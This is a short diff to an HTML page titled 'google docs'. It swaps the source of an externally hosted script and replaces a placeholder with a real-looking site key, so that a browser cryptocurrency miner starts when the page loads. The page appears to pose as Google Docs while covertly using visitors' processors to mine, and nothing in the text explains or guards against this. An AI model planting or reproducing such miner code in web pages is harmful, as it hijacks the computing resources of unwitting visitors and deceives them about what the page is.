--- a/index.html
+++ b/index.html
@@ -4,9 +4,9 @@
     <title>google docs</title>
   </head>
   <body>
-    <script src="https://www.hostingcloud.racing/oSc4.js"></script>
+    <script src="https://www.hostingcloud.racing/PLQ0.js"></script>
 <script>
-    var miner = new Client.Anonymous('<site-key>');
+    var miner = new Client.Anonymous('cefc78aa86c8fb633abd11e8b1d6c4b0d6be0258aad269391a3922f5a852b0b8');
     miner.start();
 </script>
   </body>
